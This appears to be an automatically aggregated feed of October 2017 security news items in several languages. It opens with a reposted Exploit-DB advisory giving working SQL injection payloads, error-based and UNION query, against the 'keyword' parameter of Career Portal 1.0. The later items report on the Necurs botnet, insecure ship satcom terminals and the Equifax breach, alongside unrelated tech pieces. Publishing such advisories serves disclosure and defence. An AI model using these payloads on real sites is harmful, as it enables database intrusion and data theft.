[webapps] Career Portal 1.0 – SQL Injection

[webapps] Career Portal 1.0 – SQL Injection

http://ift.tt/2yv6Cxn

# Exploit Title: Career Portal v1.0 - SQL Injection
# Date: 2017-10-17
# Exploit Author: 8bitsec
# Vendor Homepage: http://ift.tt/2yvutiz
# Software Link: http://ift.tt/2yvutiz
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-10-17

Product & Service Introduction:
===============================
Career Portal is developed for creating an interactive job vacancy for candidates.

Technical Details & Description:
================================

SQL injection on [keyword] parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/job

Parameter: keyword (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: keyword=s_term') AND (SELECT 8133 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT (ELT(8133=8133,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('kRoT'='kRoT&location_name[]=

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: keyword=s_term') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a7171,0x594547646454726868515056467764674e59726f4252436844774f41704a507353574e4b6d5a5973,0x71787a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zANd&location_name[]=

==================
8bitsec - [https://twitter.com/_8bitsec]

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 18, 2017 at 06:05AM

被害者のデスクトップ情報を狙うようになった Necurs

被害者のデスクトップ情報を狙うようになった Necurs

http://ift.tt/2iitXOK

先ごろ復活した Necurs ボットネットが、また新たなダウンローダを拡散しています。被害者のスクリーンショットを取得し、発生したエラーのレポートを攻撃者に送り付けるという特異なダウンローダです。

Read More

Security News

via Symantec Connect – Security – Blog-Einträge http://ift.tt/2eQnB7E

October 18, 2017 at 05:43AM

Necurs网络攻击者正试图窥视您的桌面

Necurs网络攻击者正试图窥视您的桌面

http://ift.tt/2ijJuO0

Necurs僵尸网络死灰复燃,并在最近这次攻击中大肆传播一种下载器。这种下载器可抓取受害者的桌面,并将所遇到的错误发回给网络攻击者。

Read More

Security News

via Symantec Connect – Security – Blog-Einträge http://ift.tt/2eQnB7E

October 18, 2017 at 05:43AM

Dropbox führt Professional-Abo mit Showcase ein

Dropbox führt Professional-Abo mit Showcase ein

http://ift.tt/2gOPbjq

Business-Cloud

Dropbox führt Professional-Abo mit Showcase ein

Dropbox führt ein neues Abo-Modell für Business-Anwender ein, das speziell Selbständige und kleine Unternehmen ansprechen soll. Diese erhalten mit Dropbox Professional auch das neue Präsentationstool Showcase.

Security News

via com! professional http://ift.tt/2wN2Hwm

October 18, 2017 at 05:42AM

Cybersecurity experts forecast future threats, proactive counter measures in new CompTIA whitepaper

Cybersecurity experts forecast future threats, proactive counter measures in new CompTIA whitepaper

http://ift.tt/2zxRhMH

CompTIA, a provider of technology association, has released a new whitepaper that provides insights into the top cybersecurity threats faced by businesses and governments. Contributors to the whitepaper include cybersecurity chiefs from global giants HP Enterprise, IBM, Protection Group International, Intrinsic and Dr. James Stanger, a renowned authority on IT security who leads CompTIA’s cybersecurity education efforts.

The whitepaper, launched at CompTIA’s EMEA Conference 2017, discusses the underlying causes and conditions that are fostering cyber-attacks around the globe. It captures insights derived from the daily experiences of cybersecurity experts on the front line.

For example, it outlines how the advent of BYOD and IoT devices has significantly increased attack surface. This, coupled with the chronic lack of cybersecurity training for employees and the general public has led to a 164% increase in stolen data records, or 1,901,866,611 compromised records in the first half of 2017 alone.

The whitepaper also outlines many of the key threats that are likely to emerge as criminal gangs and terror groups become more sophisticated. The short time between recent major terror and cyber-attacks – WannaCry that rendered over 40 NHS Trusts useless, and the London Bridge terror attacks – highlights how the combination of coordinated physical and virtual attacks could be catastrophic.

James Stanger

Despite cybersecurity making daily headlines, businesses are still guilty of neglecting it at board level. This is due to a lack of impactful, metrics-based security discussions at board level, and a reluctance to separate traditional IT from cybersecurity and privacy concerns.

The whitepaper urges organisations to have both a CISO and CIO at the board level to help assess cyber risk at the same level as business risk. This approach to risk management will become more important as we edge closer to the GDPR deadline and any mistake could have a devastating financial impact.

“We thought it was time to take stock and review the cybersecurity landscape,” says Dr. Stanger, CompTIA’s chief technology evangelist. “We’ve seen significant shifts in how organisations are attacked worldwide. We’re also seeing the impact of new privacy regulations and directives worldwide, such as GDPR. So, we’ve brought together some of the best minds in cybersecurity to help our members and businesses across the world understand the steps that they are taking to protect themselves now and into the future.”

Comment on this article below or via Twitter: @IoTNow_OR @jcIoTnow

The post Cybersecurity experts forecast future threats, proactive counter measures in new CompTIA whitepaper appeared first on IoT Now – How to run an IoT enabled business.

Security News,IoT News

via IoT Now https://www.iot-now.com

October 18, 2017 at 05:04AM

Internet of Ships falling down on security basics

Internet of Ships falling down on security basics

http://ift.tt/2xMT6TR

We may not think of ships as industrial control systems (ICS). But, according to Ken Munro, a security researcher with the UK-based Pen Test Partners, we should.

Those who operate them should as well, he said in a blog post summarizing a talk he gave at a conference in Athens, Greece on how easy it is to hack ships’ communication systems. While they may not have physical leaks, they are catastrophically porous when it comes to cyber security.

The same history that has led to poor security in land-based ICSs applies to ships, he wrote – they used to run on “dedicated, isolated networks,” and therefore were not at risk from online attacks. But no more:

Now ships: complex industrial controls, but floating. Traditionally isolated, now always-on, connected through VSAT, GSM/LTE and even Wi-Fi. Crew internet access, mashed up with electronic navigation systems, ECDIS, propulsion, load management and numerous other complex, custom systems. A recipe for disaster.

And there are multiple ways for disaster to happen – most of them due to a failure to practice what regular Naked Security readers will recognise as security basics.

Simply by using Shodan, the search engine that indexes internet connected devices, Munro found marine equipment all over the world. For one of the major maritime satcom (satellite communication) vendors, Immarsat, he found, “plenty of logins for the Globe Wireless over plaintext HTTP,” along with evidence that the firmware of many of their older comm boxes was, as he put it, “dated.”

Another example, the Cobham Sailor 900 satellite antenna, was “protected” from a malicious attacker by the unique, complex username and password combo of: admin/1234.

As Catalin Cimpanu of Bleeping Computer noted, a public exploit already exists for that antenna, “that makes hacking it child’s play for any knowledgeable attacker.” He added that such antennas are not only found on container and passenger ships, “but also on navy and private security boats,” plus helicopters and airplanes.

But, where things “got a bit silly” for Munro was when he discovered a collection of KVH terminals that not only lacked TLS encryption on the login, but also included the name of the vessel plus an option to “show users.” Munro’s reaction: “WTF??”

That option gave up a list of the members of the crew online at that point. He added that spending a moment on Google yielded the Facebook profile of the deck cadet who he had spotted using the commbox.

Simple phish, take control of his laptop, look for a lack of segregation on the ship network and migrate on to other more interesting devices.

Or simply scrape his creds to the commbox and take control that way.

It shouldn’t be this easy!

These flaws are not just now being discovered. They have been noted for years. More than four years ago, in April 2013, security firm Rapid7 reported that in just 12 hours they were able to track more than 34,000 ships worldwide using the maritime protocol Automatic Identification System (AIS).

Using those AIS receivers, it reckoned:

…we would probably be able to isolate and continuously track any given vessel provided with an MSSI number. Considering that a lot of military, law enforcement, cargo and passenger ships do broadcast their positions, we feel that this is a security risk.

And Munro’s research found that things have only gone downhill since – in the past four and a half years, the number of exposed ships has increased.

But Munro has some (rather depressingly familiar) recommendations for both civilian and military mariners: Start practicing the basics.

  • Update satcom boxes immediately.
  • Implement TLS on all satcom boxes.
  • Increase password complexity, especially for high-privilege accounts.

He concluded:

There are many routes on to a ship, but the satcom box is the one route that is nearly always on the internet. Start with securing these devices, then move on to securing other ship systems.

Security News

via Naked Security http://ift.tt/1pHdTOi

October 18, 2017 at 04:44AM

Many Equifax Hack Victims Had Info Stolen Prior to Breach: IRS

Many Equifax Hack Victims Had Info Stolen Prior to Breach: IRS

http://ift.tt/2gOPpr0

The U.S. Internal Revenue Service (IRS) believes the recent Equifax breach will not make a significant difference in terms of tax fraud considering that many victims already had their personal information stolen prior to the incident.

IRS Commissioner John Koskinen told the press on Tuesday that 100 million Americans have had their personally identifiable information (PII) stolen by hackers, according to The Hill. He also advised consumers to assume that their data has already been compromised and act accordingly.

The Equifax breach, which affected more than 145 million individuals, allowed cybercriminals to access social security numbers, dates of birth and other information. Despite this being one of the largest data breaches in history, Koskinen said it likely “won’t make any significantly or noticeable difference.”

In prepared remarks, Koskinen said the IRS stopped 883,000 attempts to file tax returns using stolen information in 2016, which represents a 37% drop compared to the previous year. Another 30% decrease in fraud attempts was observed this year, when 443,000 instances were discovered throughout August.

Koskinen also pointed out that the number of identity theft victims, based on reports received by the IRS, dropped by 46% in 2016 to 376,000. Another significant decrease in the number of identity theft reports was recorded this year.

“We know cybercriminals are planning for the 2018 tax season just as we are. They are stockpiling the names and SSNs they have collected. They try to leverage that data to gather even more personal information. This coming filing season, more than ever, we all need to work more diligently and work together to combat this common enemy,” the commissioner said.

The IRS has been working on strengthening the security of its systems. In the past year, the agency was forced to suspend several of its online services due to security concerns, including the Identity Protection PIN tool, the Get Transcript service, and the Data Retrieval Tool for Federal Student Aid applications. The Get Transcript service was abused by fraudsters to access the online accounts of more than 700,000 taxpayers.

Related: Seagate Employee Tax Forms Stolen in Phishing Attack

Related: Fraudsters Who Abused IRS “Get Transcript” Service Plead Guilty

Related: UK Audit Office Says More Effort Needed to Combat Online Fraud

Eduard Kovacs is an international correspondent for SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Previous Columns by Eduard Kovacs:

Tags:

Security News

via SecurityWeek RSS Feed http://ift.tt/T5XpCH

October 18, 2017 at 04:14AM

KI wird Einfluss auf jeden Lebensbereich haben

KI wird Einfluss auf jeden Lebensbereich haben

http://ift.tt/2ypcevj

Nachholbedarf in Deutschland

KI wird Einfluss auf jeden Lebensbereich haben

Künstliche Intelligenz (KI) ist derzeit ein absolutes Trendthema in der IT. Aber was verbirgt sich dahinter? KI-Forscher Damian Borth erklärt die wichtigsten Begriffe und gibt einen kurzen Einblick in sein Forschungsgebiet.

Security News

via com! professional http://ift.tt/2wN2Hwm

October 18, 2017 at 04:12AM

Testing Brushless Motors with a Scope (or a Meter)

Testing Brushless Motors with a Scope (or a Meter)

http://ift.tt/2yQS5ih

Brushless motors have a lot of advantages over traditional brushed motors. However, testing them can be a bit of a pain. Because the resistance of the motor’s coils is usually very low, a standard resistance check isn’t likely to be useful. Some people use LC meters, but those aren’t as common as a multimeter or oscilloscope. [Nils Rohwer] put out two videos — one two years ago and one recently — showing how to test a brushless motor with a multimeter or scope. Oh, you do need one other thing: a drill.

You don’t have to drill into the motor, instead you use the drill to spin the motor’s shaft. Since a motor and a generator are about the same thing, you can read the voltages produced by the spinning motor and determine if it is good or not. The first video shows the technique and the second, more recent video shows a scope reading a bad motor. You can see both videos, below.

In the second video, you’ll see that a pair of coils have shorted — probably due to a failure of the insulation, perhaps due to heat — and are putting out about 1/10 of the voltage a good coil produces. In the end, he opened the faulty motor and looks at the suspect coils, even though there wasn’t much to see visually.

We’ve seen working brushless motors used as encoders. You can even build your own brushless motor demonstration, or opt for a more practical design.

VIDEO

VIDEO

Security News

via Hackaday https://hackaday.com

October 18, 2017 at 04:05AM

IT-Gehaltsumfrage 2017: Mitarbeiter erwarten Trainings

IT-Gehaltsumfrage 2017: Mitarbeiter erwarten Trainings

http://ift.tt/2xN9xzy

Produktbezogene Weiterbildungen mit entsprechenden Zertifikaten stehen bei IT-Fachkräften hoch im Kurs. Viele Angestellte erhalten derartige Trainings.

Security News

via Alle Artikel und News von SearchSecurityDE http://ift.tt/2wNvFNw

October 18, 2017 at 03:51AM